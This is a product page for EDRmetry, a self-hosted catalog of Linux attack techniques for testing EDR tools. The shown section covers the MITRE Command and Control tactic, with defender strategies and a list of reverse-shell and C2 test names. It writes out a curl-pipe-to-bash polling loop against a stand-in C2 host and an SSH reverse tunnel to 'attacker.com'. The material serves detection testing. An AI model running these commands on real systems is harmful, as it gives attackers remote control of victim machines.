EDRmetry Linux Matrix For Download / Self-Hosted - Comprehensive Hands-On Attack TTPs Catalog
- Buy now
- Learn more
1. EDRmetry Overview

Introduction
What you will get?
Goals / What to expect
EDRmetry Matrix
Virtual Machines / C2
EDRmetry Generic Flow
Contextual Execution
Changelog / Updates
2. EDRmetry Deployment

Deploy your EDRmetry Matrix Docker Container
Download EDRmetry Matrix JSON Database
Import your EDRmetry Matrix JSON Database
Provision your TARGET_X VM
Provision your KALI_X or C2_X VM
Request for HTTPS Hosted Access to EDRmetry Matrix
3. Research and emulation of Linux threats

MITRE ATT&CK TACTICS in the Linux Ecosystem
Linux Threat Landscape
Initial Access - TA0001
Discovery - TA0007
Execution - TA0002
Defense Evasion - TA0005
Persistence - TA0003
Privilege Escalation - TA0004
Exfiltration - TA0010
Command and Control - TA0011
Lateral Movement - TA0008
Credentials Access - TA0006
Impact - TA0040
Collection - TA0009

Command and Control - TA0011

Objective:

Establish and maintain communication with compromised systems. Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

ID: TA0011
- https://attack.mitre.org/tactics/TA0011/

Linux Context:

C2 on Linux often uses HTTP/HTTPS via curl or wget, blending with web traffic. DNS tunneling (e.g., iodine) or SSH reverse tunnels ssh -R) provide encrypted channels. Custom ELF implants or scripts (e.g., Python-based C2) connect to attacker domains, while legitimate services like Slack, Telegram, or GitHub APIs are abused for stealth. In cloud setups, attackers leverage S3 or DynamoDB for C2 data exchange. Persistence ensures that C2 survives reboots.
ID: TA0011
- https://attack.mitre.org/tactics/TA0011/

Key Techniques:

Application Layer Protocol (T1071): HTTP-based C2 with a custom client.
Encrypted Channel (T1573): SSH or TLS-based communication.
Ingress Tool Transfer (T1105): Downloading additional payloads.

Linux Example:

Running while true; do curl -s http://c2.com/cmd | bash; sleep 60; done or ssh -R 1234:localhost:22 attacker.com.

Defender Strategies:

Inspect outbound traffic with proxies (e.g., Squid), block known C2 domains, and monitor DNS anomalies. Deploy EDR for C2 detection

The current list of corresponding EDRmetry test definitions includes:

EDR-T6254 - DNS AXFR Payload Delivery
EDR-T6264 - eBPF Keylogger + DNS RCE
EDR-T6212 - Emp3r0r C2 Shadowsocks C2
EDR-T6090 - Execute Offensive Linux Tunneling tools
EDR-T6076 - Execute process via ProxyChains
EDR-T6224 - Fileless Reverse shell with sshx
EDR-T6123.014 - Gsocket Secure Connection
EDR-T6123.013 JSP+sh
EDR-T6075 - Make Non-standard port HTTP/HTTPS connection
EDR-T6126.004 - Merlin HTTPX C2
EDR-T6126.001 - Meterpreter reverse_tcp/https
EDR-T6126.005 - Mythic+Poseidon Websockets C2
EDR-T6126.003 - Mythic+Thanalos HTTP C2
EDR-T6200 - Ngrok Tunneling
EDR-T6123.008 - openssl+bash+/dev/fd/3
EDR-T6123.010 - PHP+bash
EDR-T6126.006 - Platypus C2
EDR-T6123.001 - Process Masquerading as kworker+exec+/dev/tcp
EDR-T6123.003 - Revshell curl+telnet
EDR-T6123.002 - Revshell curlshell
EDR-T6123.004 - Revshell mkfifo+nc
EDR-T6123.016 - Revshell on LKM call_usermodehelper()
EDR-T6123.012 - Revshell over GDB
EDR-T6123.009 - Revshell perl+ENV keys
EDR-T6123.006 - Revshell Perl+socket
EDR-T6123.015 - Revshell Python TLS
EDR-T6123.005 - Revshell python+socket+pty
EDR-T6123.007 - Revshell socat+bash
EDR-T6191 - Shell over HTTP streams
EDR-T6190 - Shell Over Reverse SSH
EDR-T6126.002 - Sliver C2 MTLS
EDR-T6134 - Upgrade a reverse shell to a PTY shell
EDR-T6011.011 - Webshell PHP FFI
EDR-T6148 - XOR shell_reverse_tcp Loader